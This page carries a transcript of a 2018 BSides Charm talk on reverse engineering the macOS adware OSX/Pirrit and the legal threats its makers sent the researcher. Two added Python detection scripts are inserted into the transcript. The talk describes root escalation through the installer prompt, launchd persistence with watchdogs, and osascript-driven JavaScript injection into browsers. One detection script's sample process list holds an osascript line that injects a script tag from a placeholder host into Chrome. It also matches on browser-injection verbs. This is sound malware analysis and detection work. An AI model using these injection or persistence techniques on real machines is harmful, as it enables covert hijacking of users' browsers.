
How We Reverse Engineered OSX/Pirrit, Got Legal Threats and Survived

BSides Charm · 2018 · 55:23 · 52 views · Published 2021-05
About this talk
Amit Serper recounts his investigation into OSX/Pirrit, a macOS malware that injects data into browsers, disables removal, and degrades system performance. After publishing analysis and identifying the creators through metadata mistakes, Serper received daily legal threats from the malware authors' lawyers—while continuing to document evasion techniques, browser hijacking, and attribution methods that revealed their operational security failures.
Original YouTube description
How we reverse engineered OSX/Pirrit, got legal threats and survived

What if I told you that you have a piece of software on your machine that runs with root privileges, injects data into your browser without you even knowing, makes itself impossible to remove, and heavily impacts the performance of your machine? Join me for a session about OSX malware reverse engineering, the legal threats that we got from the malware authors, IDA screenshots and opsec fails.

Presenter: Amit Serper (@0xAmit)

Amit leads the security research at Cybereason's Boston HQ. He specializes in low-level, vulnerability and kernel research, malware analysis and reverse engineering. Whenever he is not taking apart malware and exploring the dark and undocumented corners of operating systems at the office, you could find him in his lab at home reverse engineering routers and other IoT devices and finding horrible bugs on them. Prior to joining Cybereason, Amit spent nine years leading security research projects and teams for the Israeli government, specifically in embedded system security.
Transcript [en]

Awesome, okay. Welcome guys, thank you very much for coming. I'm gonna share a story with you about OSX/Pirrit, which is for me literally the gift that keeps on giving. The obligatory who am I: as of now I am the head of security research at Cybereason Nocturnus, which is our new research lab that we're building right now. We're also hiring, so feel free to reach out to me either here or over on Twitter. I do lots of different forms of research, malware analysis and low-level research, and just for shits and giggles I find exploits on things, and then they turn out into

giant botnets. And I shitpost on Twitter a lot, so that's my handle over there. That used to be my profile picture up until pretty recently, and sometimes my [ __ ] posting causes a lot of trouble. So I'm Israeli, I live in Boston, but originally I'm Israeli, and I came back from Israel a couple of weeks ago. I was visiting my family, and when I landed I went to the quick passport control thing where you put your hand in and it tells you that you can go. So I literally crashed the [ __ ] thing with my hand, and I took a picture and I said, holy [ __ ], that's Windows XP,

that shouldn't run there. So I put it on Twitter, and two days later that was a headline.

So I should shitpost less, I guess, or more, depends on how you look at it. Okay, let's start. Just gonna hold this like this. Okay, so what are we talking about here? So I'll give you the background. If any of you are following me on Twitter, I tweeted a bunch of links yesterday and said if you are coming to my talk you might want to read those links, because it'll give you some of the backstory. But in case you didn't, I will give you a very, very quick version of it. So back in 2016 I was at home and I was bored and I was in IRC, and someone said, my Mac is acting really

weird, anyone wants to take a look at that? So I talked to that guy and said, hey, send me some files. It ended up being a new OS X adware malware. For me it's always malware, there's no such thing as adware. And it was a port for Mac of the Pirrit adware for Windows, and I completely tore it apart, and I did a bunch of write-ups on it and a bunch of talks, and it's like every month I learned a new detail. And after three months of reverse engineering this, after I did my first talks, I actually found inside one of the files, so the

the creators of this adware, malware, whatever you want to call it, they kept pushing updates, because after I did all of my talks they started frantically changing things. And in one of the versions that they pushed out, the new versions, they weren't careful enough and they left their first and last names inside one of the archives. And I stumbled upon it, and I was like, okay, LinkedIn. And one guy was the VP R&D and the other guy was just one of the programmers there, and they work for an Israeli company called TargetingEdge. And after I published another article with their faces blurred and I said, okay, I know who you are,

they took down all of their servers and they became quiet for a while. And then in November, last November, I have some YARA rules that I always run for stuff that I found, and in November everything started to light up like a Christmas tree all of a sudden, after it was really quiet for a while. I was like, okay. So as I said, I have a bunch of YARA rules always running for things that I'm doing research for, and they're running on all sorts of different systems, be it VirusTotal or our own product that we develop at Cybereason. And I was like, oh wow, this is rad, and as

I said, I shitpost a lot, so I tweeted, and it took like a day and we started getting letters from their legal department. Now this was very personal, as you can see: Mr. Amit Serper has been referring to our client's product on social media as malware. That's because it is. No, I wanna take the time for a second to read it, because it's really funny. I worked a lot, like the whole purpose of this talk is, I worked a lot with our legal department on this, because if you work for a company and you start to get legal threats, be it against you personally or

against the company you work for, you need to work with legal, otherwise you're doing it wrong. So they basically said, we're not doing malware, this is not malware, everything is legit. I am a quote-unquote expert, basically they're trying to say that I'm an idiot. As you can see in the second one: is the cyber security expert Cybereason considers itself as, well known in clear to Cybereason that adware is not explicitly malware. Now they knew that the write-up was coming up, because I said that it will come up on Twitter. And they send us letters every day, every day, sometimes they send us more than one, and every day they change their

narrative. So they started with: everything we're doing is perfectly fine. And then they said: we are legitimate adware and we are not malware and we are not using exploits. The product nor our client do not spy or takes over the browser. The product does not collect nor store any personal, aggregated or sensitive information of the user, rather solely technical device data which is used in real time. Isn't that the same thing? The product does not, nor does it attempt to, exploit any device vulnerability. Remember this sentence. And it was developed, distributed and functions according to Apple's guidelines. Okay. Please note that Cybereason's claim regarding the use of AppleScript, we will get back to

that, is redundant, as such is legal and legitimate as a feature explicitly designed for developers. So does CreateRemoteThread, but still a lot of malware use that, so it doesn't make any sense. The product is not Pirrit or OSX/Pirrit, please remember that sentence, as explicitly stated by our client in response to the previous report published by Cybereason, blah blah blah. This is not us, like they're saying we have nothing to do with this. In contrary to the claims detailed in the abstract, our client is not trying to distance its activity from the Pirrit software. I call [ __ ], and you'll see that as well,

from the simple reason that the product is not the Pirrit software. Okay. And then they said, and this is like all from different letters, like we got every day, like we had new reading materials, and our legal department kept sending me Slack messages: oh, we have another letter from them, do you want to read it? I'm like, of course, bring on the popcorn. And then they said, in one of their letters they said, we're not malware, here is what malware is, and they gave a list of like, this is how ESET, the AV company, defines malware. Well, what do you know, they answer to

each one of those. Each one of those sentences basically describes their product. The product nor our client do not spy or takes over the browser. Yeah. So at that point I was like, okay. So after they realized that the report is coming, because some journalists talked to me before I published this report and some journalists actually reached out to them and they tried to get their response, which was pretty difficult, they realized that it's happening, the report is coming up. So they said, okay, put this in your report, like this is a whole blurb that they wrote to us, and they said

we demand you to put this in your report. Now we don't owe them [ __ ], like we don't need to put that in our report, but we said okay, so this ended up being in my report and in this slide. Okay, did you all get a chance to read that? Like, we highly respect the privacy of the users and completely comply with all the... It's not true. So in one of the things they said here, they said we have an end user license agreement. Well, we couldn't find it anywhere. Like, I double dare all of you to go to their websites, Google TargetingEdge end user license, just do it right now. There is nothing.

And their website also had a contact form and an email address which doesn't work. So this is Zack Whittaker from ZDNet who wrote about it, and he sends me this screenshot. So we went to their website, targetingedge.com, there's a contact us form and there's an email, info@targetingedge.com. So he sends them an email: hey, I'm reaching out for a comment regarding a new report, blah blah blah. He gets an error, address not found. Okay, so this is like, seriously, this is awesome, and you ain't seen [ __ ], like we're just starting. So before we start I need to tell you,

and it's another bit of history, about how the old version of OSX/Pirrit, the one from almost two years ago, how it worked. So adware is really popular on Macs. So if Mac owners tell you, oh look, we're on Mac, we don't get viruses, we don't get adware, we don't get pop-ups, I call [ __ ] on this one directly. Adware is really popular, so people go to various websites like Softonic and all of those download websites, and they download whatever they want to download from them, from that website. So let's say someone wants to download VLC media player, so he goes to Softonic, he writes

VLC media player, and he gets like an installer. And this is how all of those adware companies work, basically they're calling them installation monetization solution, which is another word for like, we're in your computer doing [ __ ]. And you get an installer that actually installs the VLC media player, but then you get like herpes with that. That was my analogy from two years ago, which is available on YouTube for your own enjoyment. And those installers back then used something that's called a preflight script. So you know that when you start the installer you get this like, oh, welcome to the installer of blah blah blah, click next. And this is even before you

see any end user license agreement. So once you are opening the installer, what's called a preflight script runs and starts like installing all of the bad stuff. You'll get the VLC media player after you'll hit next, but all of the bad stuff comes right when you start the installer, before you even looked at the end user license agreement, which I doubt that it tells you about all of that, but whatever. So now we fast forward to last November. So what I did is I started getting samples of new installers, and basically new samples of the new OSX/Pirrit. And when I looked at

what it's doing, what's going on, I saw that it sends an HTTP request to that URL. Now every request had a one-time ID in there, like a GUID that you had to supply, and that the installer did, because every link only worked once. And I wanted to grab a bunch of samples, and the sample that I got, like the one that I got from the logs that we had, the ID didn't work because it was already used. So when everything fails, apply [ __ ], that's like my life motto. So I was like, okay, let's try to do this manually, let's try to take the link

and instead of an ID let's just send a quote, just see what happens. Literally the first thing I did, I got back a URL from the server. Like I send a request with a single quote and I get a URL back from the server, and I was like, okay, let's request that URL. Bam, I get a huge script, this is like 360-something lines, I think it says so in the next slide, and this is like their installation script, that's what's running before you even installed anything. And I don't know if you can see it, hold on, I want to zoom. Like if you

look, it's like a word jumbo, it's really fun, like that's what I did for a few weeks. You have like sudo and stuff that runs as root, and like all of those things are happening on your machine and you have no idea, because you didn't read the end user license agreement. And you're probably asking yourself here, like you see right in the middle there's a sudo killall osascript, which is AppleScript, which is fine. And you're probably asking yourself, how do they get root privileges, how can they run sudo, are they using any kind of exploits? Of course not. So how many of you are using Macs, show of hands? Okay, cool.

So all the people that use Macs, and if you don't use a Mac I'm about to tell you: most installers, when you run them, they ask for your password. The reason that they ask for your password is to elevate their privileges. To elevate their privileges on Macs, in OS X, the user that you have is by default on the sudoers list. So if you enter your password it elevates itself and you're root, it's like doing sudo su basically. So this is how they do it: like their installer runs and it just asks for your password, and you give it your password and it's root, and then you have all of those things running in the

background as root. And you can see like it's downloading stuff from a lot of URLs, and we're gonna talk about that. So that script is huge, as I said it's 329 lines in bash that I had to go through, it took me three days, it's not fun. And it's very similar, if not almost identical, to the script that I analyzed two years ago from old Pirrit, which is not made by them, which was already proven by me, but okay. The script has many URLs that it sends requests to, and a lot of those URLs look like DGA domains. Do we all know what DGA domains are, show of hands? Okay, so DGA

domains are like weird and long and usually random-looking domain names, like q2wedcfz and a number dot com. Those domains, you only see that in malware, like there's no reason whatsoever for like, oh yeah, email me at amit@qa295z, like it doesn't make any sense. And usually those domains, there's a logic behind it, like there's an algorithm that calculates it, makes those domains, and then attackers can, basically the malware generates the domains and the attackers can register the domains way after, so like there will always be a domain that will connect. It's basically very hard to

block, unless you're using some sort of an endpoint solution that I happen to be working for a company that makes one, and we'll see that as well. Now this is like, do you know the Russian matryoshka dolls, like you open one and there's another one and there's another one? This is how it works, like this thing downloads like seven, eight different payloads, each step of the way, and each payload has like a new thing that it's doing. Now a payload can be sometimes a script and it could be a binary file that does stuff, and we're gonna talk about that as well. So what happens

is, that script is generating a random name. Like it takes, every Mac has this file, /usr/share/dict/words, and it has words in it, like words from a dictionary. The script simply, there's a function called rd, for random, if you guys over there can see it, and it literally just picks a random word and saves it to a variable, a random word from all of those lists, and then it creates a directory in the user's home directory, that's the tilde, in ~/Library/randomname. That random name is generated by that function. What also is happening is that the unique ID of the machine, again no private data, no,

no, nothing identifying, it's fine. The unique identifier of the machine is extracted and being sent to TargetingEdge's servers along with the path and the random name that was chosen. So every time their adware, legit adware as they say, was installed on your machine, they actually know, like they can identify you by your machine's unique identifier and which random word and where it was installed. And if you see here, these are, god damn it, these are the weird domains you see here, pw.09aed5mck3, legit, yeah, and it's like, no, it's not malware, it's fine. Now once this data was submitted to their server, the server will send you another payload.
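As an added example, not part of the talk, here is a small hunting check for the persistence pattern just described: a launchd job whose program sits under ~/Library/<random dictionary word>/. The sample plists, the word list and the allowlist are constructed placeholders; on a real Mac you would feed it the files from ~/Library/LaunchAgents, /Library/LaunchDaemons and /usr/share/dict/words.

```python
"""Hunting check for the OSX/Pirrit persistence pattern described in the talk:
a launchd plist whose program lives in ~/Library/<random dictionary word>/.
All sample plists, the word list and the allowlist below are constructed
placeholders, not artefacts from the talk."""
import plistlib
import re
from typing import Dict, List, Tuple

# Folders that Apple and well-behaved apps legitimately create under ~/Library.
# Constructed allowlist: extend it with whatever is normal in your own fleet.
ALLOWLIST = {
    "Application Support", "Caches", "Containers", "Cookies", "Fonts",
    "Keychains", "LaunchAgents", "Logs", "Preferences", "Saved Application State",
}

# Constructed stand-in for /usr/share/dict/words; "roadless" is the name the
# talk mentions from the speaker's test machine.
DICT_WORDS = {"roadless", "lantern", "zephyr", "apple", "table"}

# Matches the ~/Library/<folder>/ prefix of a program path, with or without
# the home directory expanded.
LIBRARY_FOLDER = re.compile(r"^(?:~|/Users/[^/]+)/Library/([^/]+)/")


def classify_plist(plist_bytes: bytes, dict_words=DICT_WORDS) -> Tuple[str, List[str]]:
    """Return (Label, reasons) for one launchd plist; reasons is empty when the
    plist shows none of the traits discussed in the talk."""
    plist = plistlib.loads(plist_bytes)
    label = plist.get("Label", "<no label>")
    args = plist.get("ProgramArguments") or []
    program = plist.get("Program") or (args[0] if args else "")
    reasons = []

    match = LIBRARY_FOLDER.match(program)
    if match:
        folder = match.group(1)
        if folder not in ALLOWLIST and folder.lower() in dict_words:
            reasons.append(f"program lives in ~/Library/{folder}/, a bare dictionary word")
    # RunAtLoad plus KeepAlive is launchd's own way of keeping a job alive;
    # only worth reporting once the odd folder has already flagged the job.
    if reasons and plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad and KeepAlive set (relaunched if killed)")
    return label, reasons


def hunt(plists: Dict[str, bytes]) -> List[Tuple[str, str, List[str]]]:
    """Run classify_plist over {filename: plist bytes} and keep only the hits."""
    hits = []
    for name, data in plists.items():
        label, reasons = classify_plist(data)
        if reasons:
            hits.append((name, label, reasons))
    return hits


def sample_plists() -> Dict[str, bytes]:
    """Constructed sample data: one ordinary agent and one Pirrit-style agent."""
    benign = {
        "Label": "com.example.updater",
        "ProgramArguments": ["/Users/alice/Library/Application Support/Example/updater"],
        "RunAtLoad": True,
    }
    pirrit_like = {
        "Label": "com.roadless.agent",
        "ProgramArguments": ["/Users/alice/Library/roadless/roadless", "--start"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }
    return {
        "com.example.updater.plist": plistlib.dumps(benign),
        "com.roadless.agent.plist": plistlib.dumps(pirrit_like),
    }


if __name__ == "__main__":
    for name, label, reasons in hunt(sample_plists()):
        print(f"{name} ({label}):")
        for reason in reasons:
            print(f"  - {reason}")
```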

This payload will be downloaded and a launch agent will be created for it. Now a launch agent on Macs is basically an autorun. There are several types of autoruns on Mac, but the most important ones are launch agents and launch daemons. A launch agent will start when the user logs in, and a launch daemon will start when the operating system boots, before the user logs in. So that's the difference between the two, and it creates both of them, so launch agents and launch daemons, and they have like five different ones of them, so they always have persistence. And they have watchdogs that

guard that the other launch agent still exists, so it's fine, it's legit. Then after this launch agent is being created, so as you can see it downloads right here, it downloads this archive, this tc.tgz, and that file has a binary in it. So I started looking at that binary as well, I started reverse engineering it, and I looked at just the names of the functions: didReceiveResponse, didReceiveData, willCacheResponse, blah blah blah, and then run external application that gets arguments. Okay, so IDA Pro, and I'll zoom in, just a sec. Okay, it calls /bin/sh, yeah, legit. It calls /bin/sh, and /bin/sh takes an argument, so

this is %@. So Objective-C, which is, if there are any iOS or macOS programmers here, wow, Objective-C is terrible. So in Objective-C, what you know as %s from C or Python is %@ in Objective-C, sort of. So it actually calls /bin/sh and supplies it, like you can supply an argument with it, so someone on their end can run whatever he wants on your machine. That's fine. So as I said, it calls and it runs stuff with /bin/sh, just like a RAT. It is code signed, so here's an interesting thing about code signatures. So all of the

binaries that were dropped by the old version of Pirrit from two years ago, all of them were signed, and the interesting thing is that they were signed and the names on the certificates were Israeli, and being Israeli I can identify Israeli names, so that's not an issue. And since the beginning I knew, like, oh, that has to be Israelis, because there's also a lot of Israeli ad tech companies in Israel, because, well, we don't really have computer crimes law, like it's not a thing. But I didn't know that it was that company, I thought it was a different company. The cool thing about two years

ago, what happened is every time I found another binary, I had like a script that automatically just gives me a list every day of the new binaries and the new signers, I would send an email to my contact in Apple and Apple would revoke the certificates. Within 20 minutes they had a new certificate, so it was insane, like they had tons of them. This is illegal, because in order to get signing certificates from Apple you need to send them some sort of an ID. I don't think they had like 250 people working for them, so those IDs weren't real, and that's illegal as well. But it's fine, it's fine.

This payload was signed, but it wasn't properly signed, it was signed with an ad hoc signature, which has no meaning on macOS. The reason is because ad hoc signatures are used to develop apps for iOS. Now I have no idea why they did that, like the actual component in the operating system, which is the AMFI trust cache, doesn't even exist in macOS. My theory, and I have no proof for it, is that it was signed like this basically to throw off anti-viruses, so they would say, oh, this is legit, this is signed, this is fine. And that payload also enumerated the list of running processes to check if there are any browsers

running, because, as we need to remember, while it is a very malicious adware, this is still adware. Like the whole point of this thing is to see where you're going, where you're browsing, and display ads for you that were meant for you, that were targeted for you, like their name is TargetingEdge for a reason. And that payload was constantly looking to see if you have any browsers running. Now that payload also installed another launch agent, using the random naming convention from before, so on my testing machine it created a random name, roadless, and that was the name of the package.

Okay, roadless, and then it downloads more payloads, yay. So inside that tgz file there were a bunch of files, as you can see, like there's something that's called browser enhancer that we'll talk about, install, updater.sh, blah blah blah, and protector. Wait, protector, the [ __ ]? So basically to serve ads and protect their own ass. Protector is a binary file and it has only one purpose: it wants to see that all the payloads are running and all the launch agents and launch daemons are there, and if they are removed for any reason they will be reinstalled. So protector protects. Protector also sets up a launch daemon with a random name, however, since I sort of uncovered in my last

report how they generate the names, like the name generation thing with the dictionary is not new, but in order to make things different for the protector they have an extra file called names.db, as you can see here, and this file has also a list of strings, and it just gets like two strings from there and builds a word. Not really clever, but it's just a different way of generating random names. Protector's and updater's installation script, so there's another script called updater, there, update.sh. They're also doing another weird thing which I found odd: they're removing a browser plugin, like in case you have it, like they check if you have a browser plugin called Omnikey,

and if you do have it they just remove it. Again, this is fine. And I didn't know what this plugin was, so I started reading, and apparently it's a plugin that allows you to, you know how in Chrome you go to the address bar and you just type something, not an address, and it Googles? So it's basically to create custom requests like that, custom searches, so you can say, okay, so here's the URL to search in eBay, and then you just do ebay space query enter and search in eBay. Now apparently this really screws with their malware, so they just remove it altogether,

without telling you. And this was another cool thing, this is why I named the talk the Da Vinci Code, because for a while I was really curious, like I called it Pirrit because I saw a string Pirrit in there, and when I Googled I saw that it's a Windows adware, but I was like really curious, how do they name it, like in there, like they don't come to work and they say, oh, we have a new version of Pirrit coming out. But luckily they suck at opsec, so everything is documented, as you will see. So while the script is installing there's like this echo installing DaVinci, and I'm like, okay, cool, DaVinci. So let's talk about browser enhancer.

Let's take a moment. I stared at it once for three minutes until I figured out, like it's [ __ ] with me, you didn't realize that, or I'm an idiot, either or. Okay. In my previous reports, when I reverse engineered their binaries, I saw that they're using the Qt programming framework. Now if you're not familiar with Qt, which is actually pronounced cute, so why did you write it Qt, I don't know. Qt is basically a framework that allows you to write code one time and then, when you're compiling it, you can say, oh, I want to compile it to Linux or Mac or Windows, and you don't have to do like all the

adaptations. The disadvantage, the con in this, is that you get all of the Qt crap bundled into your code. So when I was looking at the code, when I was reverse engineering it, I could see like all the types, like a QString, and it calls qFree, like that's the function from Qt. So again, this is another thing that ties it back to them, because this looks exactly like the code they wrote, but they still say that it's not them, even though their names were in the [ __ ] thing. Okay, now browser enhancer. So that's a whole bundle that's being downloaded to your Mac, and browser enhancer will look for

browsers in order to change their settings. Again, we're not taking over the browsers, right, they're not doing it, but this is exactly what it does. Now browser enhancer is looking for the following browsers: Firefox, Safari, Chrome and Microsoft Internet Explorer. On a Mac? What year is this? But this had happened before, so I actually found this, like there was, I also showed it in the old report, so I could find like registry strings inside code that was supposed to run on Mac. I have no idea what kind of wizardry was pulled in order to make this thing compile, because I have no idea, but okay. But again, like this is another

thing that ties it back to them. So browser enhancer's purpose is to literally hijack the search page of the browser, a thing that they said, like their attorney wrote us that they are not doing, but here it is in front of you. Like you can see that it's tracking every cookie that you get, it's hijacking your search page, so if you use the search in Google or Bing you don't do that anymore, you use a different page, and they're using AppleScript, which is something that they didn't do. Now I'm gonna talk about AppleScript, because it was also mentioned in their letter. AppleScript is a scripting

language that Apple made, and I'm gonna talk about it, and it's actually a really cool thing that you should all be scared of. So this is the search page that you now have, tksearch.com, very legit, everybody knows that. And if you look at the bottom of the page it is copyright 2017 Babylon Limited, another great Israeli company that does adware. Like do you remember the Babylon translator from like ages ago? Yeah, no, yeah, it's them, that's what they do. You think that you're translating words from Japanese? No. Okay, so every time it's like, okay, cool, this payload does that. So this presentation doesn't have all the details, if you're really

interested you should read the full report on our blog, it's like almost 30 pages long, because it has more and more and more payloads. And at that point I was like, okay, you're threatening me, that's cool, let's dance, I'm down, I'll write 30 pages just to [ __ ] back with you. So once browser enhancer is finished running, it will execute another post-installation script called post install.sh, how lovely, and it downloads another payload, and it downloads a binary this time that's called macver, I have no idea what it stands for. macver will be renamed to yet another randomly generated name using the old method that I showed you before, and after that it will create

a file called com.application.plist, and it will put it in ~/Library/Preferences, in your home directory. So this directory on Mac, which exists in every one of your home directories, has a lot of preferences, like the distance of the icons in your dock, and all sorts of OS preferences. Now if you'll create a file called com.application.plist in there, you'll think that it's perfectly legit, and it's fine, like you won't think that it's something malicious unless you know what you're doing. And again they say, like we're not trying to hide ourselves, everything is fine, everything is documented, we're legit. Yeah. Now if we look at the

browser post install script, it changes a bunch of things and it also adds a bunch of things to the Mac equivalent of the registry. So the bottom screenshot, what you can see, it actually says if you go to Google then send the user to a different page, like the loadingpages.info thing, and it sends the ID of your machine back to them, like right here. So if you used to use Google then you don't use it anymore, but they know that you wanted to go to Google and they have the unique identifier of your machine, again. Now let's break apart macver a little bit

more. So as I said, this is not a script, it is actually a 64-bit Mach-O executable. Mach-O is the executable format on Macs, Windows has PEs, Linux has ELFs, Mac has Mach-O, because they have to be different. And unlike all of the other executables it doesn't import any Qt resources, which was refreshing for a change, because this was actually a little bit different. When I looked at the string sections I saw a bunch of base64 stuff. Now we're all intelligent enough to know that base64 is super secure, like if you want to hide something, if you want to encrypt something, you encrypt it in base64. So I get a lot

of DMs on Twitter like, teach me how to hacks bro, so first, like, pro bono, always encrypt with base64. So I'm very good at what I do, so I de-obfuscated the base64, which was a challenge, and there was a lot of AppleScript code in there, like all of this base64 stuff was AppleScript. Now let's talk about AppleScript for a sec. So AppleScript is actually a scripting language that was created by Apple, and it was created for automation purposes, and AppleScript goes way back, like it's an old language, and it actually has a really cool syntax. Like the syntax of AppleScript is English, like tell application Google Chrome to do something, like that's the actual syntax.

If your machine is running in French it'll be in French, it's pretty rad. And the whole point of AppleScript was to automate tasks in other processes. So let's say that you need to run sort of a batch operation, like you have an application that, I don't know, converts video, but it can only convert one file at a time. Apple basically said, hey, the correct way of writing programs for macOS is you should create an AppleScript API for every program that you make. So if you want to fully comply with Apple's guidelines, then your program should have like a third-party API with

AppleScript, so you could, like, tell video encoder to select all files from this directory and click the button that says submit. I don't know, like, just an example. So when you think about it, it's basically code injection, and you don't have to be privileged. So if in Windows sometimes you have to be privileged in order to get a handle to a remote process and inject a DLL into that process that does something you want to do, you don't need that in Apple. You basically write AppleScript and you don't need to elevate yourself. So, "yo dawg, I heard you like code injections", so we used AppleScript to inject code that injects JavaScript. So basically, what they're doing with all

of that AppleScript code is they're finding out which browser is running, so you can see, like, "if is Safari running then tell application Safari to set page source to do JavaScript", and then just a whole bunch of JavaScript to it. So you don't even know it, and you're running Chrome, you're running Firefox, you're running Safari, or you're a wizard and you're running Microsoft Internet Explorer on a Mac. Yeah, if you can make it happen, I want to talk to you. No, not with Wine, natively, that supports AppleScript. I know Wine

has been doing this for, like, a year. So you don't even know it, and you think that your browser is, like, super secure, and like, yeah, I'm using Chrome, and Google cares about security, or Firefox cares about security, or Safari, or Microsoft Internet Explorer, but you actually have code that's being actively injected all the time into your browser. So basically every page that you visit, every site that you go to, every query that you send on whatever site that you go to, like, if you go to the source, you all of a sudden see, like, JavaScript that's not supposed to be there, and it was injected there

via code injection, which is completely fine in, like, Apple's world. Like, here is another example in Chrome: "tell application Google Chrome to tell active tab of window 1 to set source html to execute javascript". It's fine, this is fine. So this is basically what's happening behind the scenes: so you have macver, which is there, like, the malicious binary that's running on your machine, and here is the interesting thing. So there are ways of doing stuff in a stealthy fashion; they don't believe in that. So they basically just do, like, system() and then they call an application, it's called osascript, and osascript is the AppleScript interpreter. So basically, you can run

it on your Mac, you can do, like, "osascript --help" and see, like, what it does, but you can do, like, "osascript -", I think it's d, and then open quotes and just give it a bunch of [script], and what will happen is that you will always see a process called osascript doing stuff, because it's a command line argument. So if you have, like, any advanced endpoint protection system, like the one that we're making for example, you'll be able to see it. It's fairly easy: like, if you'll enable even the most simple auditing tools, some of which are even built into macOS, you'll be able to see, like, osascript and all

the things that it does. So basically osascript sends JavaScript to Google Chrome, and it also asks Google Chrome, hey, what URL are you currently visiting, what site is currently open, and it gets it, and according to that site it will send it more JavaScript. So you could see things like, and I think I have a screenshot of that later on, I was basically going to Google and I wrote "antivirus" and I hit enter. So it gave me a bunch of results and then it opened a pop-up for an antivirus company that's completely legit, like, no seriously, completely legit. So I wonder, like, who spends money on

advertising there, and if they know that they're actually advertising through these nefarious ways. Now, something about the old version of Pirrit, so this was actually a very refreshing change. The old version of Pirrit, and I talked about it, like, the talk is on YouTube, you can find it, the old version of Pirrit actually downloaded and installed a proxy server that ran on your machine. It reconfigured, through the firewall, that every HTTP request will go through the proxy that runs on your machine, and the proxy would plant all the ads and do all this [ __ ]. Now, since it's super easy to block it, and since I literally told every AV

company in the world how to do it, they don't do it anymore. So they reverted to AppleScript, which is actually pretty clever, because they're using the operating system's tools against itself. osascript is a legit Apple binary, it's signed by Apple, like, it's fine, but yet you can use it to inject malicious code into browsers without, like, doing anything crazy. All you have to do is speak English, or French. So this is what they did with AppleScript. The major caveat of that is that it's super slow, because the process, that thing, if we go back, that loop happens every second. So your browser is polled every second, and every second it injects

code into it, and sometimes if the timing isn't right, if the code is being injected, like, right when the thread in the browser is loading the page you're visiting, your browser will totally crap out. It will either crash, or it'll start to do weird things like half-loading a page and telling you it's done. And it also, it's really slow, it's really slow on your machine. So if you work on your Mac and, like, you have weird stuff like this happening to you, check which processes are running, see if osascript is running, check it from time to time. Like, if you're in an organization and you have some sort of system

where you can query all the running processes, you know, all across your organization, look for osascript. Like, a lot of attackers are using it; you can use osascript and, like, people are doing it. If you know this guy on Twitter, Dan Tentler, he did this whole talk on how he abused this guy's Mac as a part of an engagement, I think it was a reporter, how he did all sorts of crazy [ __ ] just with AppleScript, and all he did is use osascript. So it's also very easy to detect if you know what you're looking for. I think I talked about that.
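The detection the speaker describes above (an osascript process whose command line tells Safari or Chrome to run JavaScript, spawned over and over by the same parent binary) can be turned into a small check over a process listing. The example below is added here and is not code from the talk or from Cybereason. It reads lines shaped like the output of `ps -axo pid=,ppid=,user=,command=` on macOS; the snapshot embedded in it is constructed for the example, so the PIDs, the user names, the `macver` path and the script fragments are illustrative, not captured from an infected machine, and `ads.example.invalid` is a placeholder host.

```python
"""Spot osascript being used to drive a browser, as described in the talk.

Added example, not code from the talk or from Cybereason. Parses a process
listing shaped like `ps -axo pid=,ppid=,user=,command=` and reports osascript
processes whose inline script targets a browser. The sample snapshot is
constructed: PIDs, users, paths and scripts are illustrative only.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed `ps -axo pid=,ppid=,user=,command=` snapshot (not real output).
SAMPLE_PS_LINES = """\
    1     0 root   /sbin/launchd
  412     1 root   /usr/libexec/trustd
  903     1 alice  /Applications/Google Chrome.app/Contents/MacOS/Google Chrome
 2210   903 alice  osascript -e tell application "Finder" to display dialog "done"
 8802     1 root   /Library/Application Support/example/macver
 8817  8802 root   osascript -e tell application "Google Chrome" to tell active tab of window 1 to set source to execute javascript "document.body.insertAdjacentHTML('beforeend', '<script src=https://ads.example.invalid/x.js></script>')"
 8819  8802 root   osascript -e if is Safari running then tell application "Safari" to do JavaScript "document.location.href" in document 1
 9100   903 alice  /usr/bin/osascript /Users/alice/scripts/rename_photos.scpt
"""

# Applications whose AppleScript dictionaries let a script run JavaScript in a page.
BROWSER_APPS = ("safari", "google chrome", "chromium", "firefox", "brave browser", "microsoft edge")
# Verbs that push script into a page (Safari: "do JavaScript", Chrome: "execute javascript").
INJECTION_VERBS = ("do javascript", "execute javascript", "set source")
OSASCRIPT_BIN = re.compile(r"(?:^|/)osascript$")


@dataclass(frozen=True)
class Finding:
    pid: int
    ppid: int
    user: str
    browser: Optional[str]
    reasons: Tuple[str, ...]
    command: str


def parse_ps_line(line: str) -> Optional[Tuple[int, int, str, str]]:
    """Split one ps line into (pid, ppid, user, command); command keeps its spaces."""
    parts = line.split(None, 3)
    if len(parts) < 4 or not parts[0].isdigit():
        return None
    return int(parts[0]), int(parts[1]), parts[2], parts[3]


def classify(pid: int, ppid: int, user: str, command: str) -> Optional[Finding]:
    """Return a Finding if this process is osascript driving a browser, else None."""
    tokens = command.split(None, 1)
    if not tokens or not OSASCRIPT_BIN.search(tokens[0]):
        return None  # not osascript at all
    args = tokens[1] if len(tokens) > 1 else ""
    low = args.lower()
    browser = next((b for b in BROWSER_APPS if f'tell application "{b}"' in low), None)
    verbs = tuple(v for v in INJECTION_VERBS if v in low)
    if browser is None and not verbs:
        return None  # osascript talking to Finder or running a .scpt: benign for this check
    reasons = []
    if browser:
        reasons.append(f'tells application "{browser}"')
    if verbs:
        reasons.append("injects into page via " + ", ".join(verbs))
    if args.split()[:1] == ["-e"]:
        reasons.append("script passed inline with -e, full text visible in argv")
    if user == "root":
        reasons.append("runs as root but drives a user's browser")
    return Finding(pid, ppid, user, browser, tuple(reasons), command)


def scan_ps_output(text: str) -> List[Finding]:
    findings = []
    for line in text.splitlines():
        parsed = parse_ps_line(line)
        if parsed:
            finding = classify(*parsed)
            if finding:
                findings.append(finding)
    return findings


def injector_parents(findings: List[Finding]) -> Dict[int, List[int]]:
    """Group flagged osascript PIDs by parent: the parent is the binary running the loop."""
    by_parent: Dict[int, List[int]] = {}
    for f in findings:
        by_parent.setdefault(f.ppid, []).append(f.pid)
    return by_parent


if __name__ == "__main__":
    found = scan_ps_output(SAMPLE_PS_LINES)
    for f in found:
        print(f"pid {f.pid} (parent {f.ppid}, user {f.user}): " + "; ".join(f.reasons))
    print("injector parents:", injector_parents(found))
```

On a real fleet you would feed it `ps -axo pid=,ppid=,user=,command=` from each host (or the equivalent process telemetry from an EDR) and repeat the snapshot a few times: because the injection loop fires roughly every second, the same parent PID keeps showing up with fresh osascript children, and that parent is the binary to pull for analysis. The check deliberately ignores osascript runs that do not name a browser, so Finder automation and `.scpt` files do not create noise.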

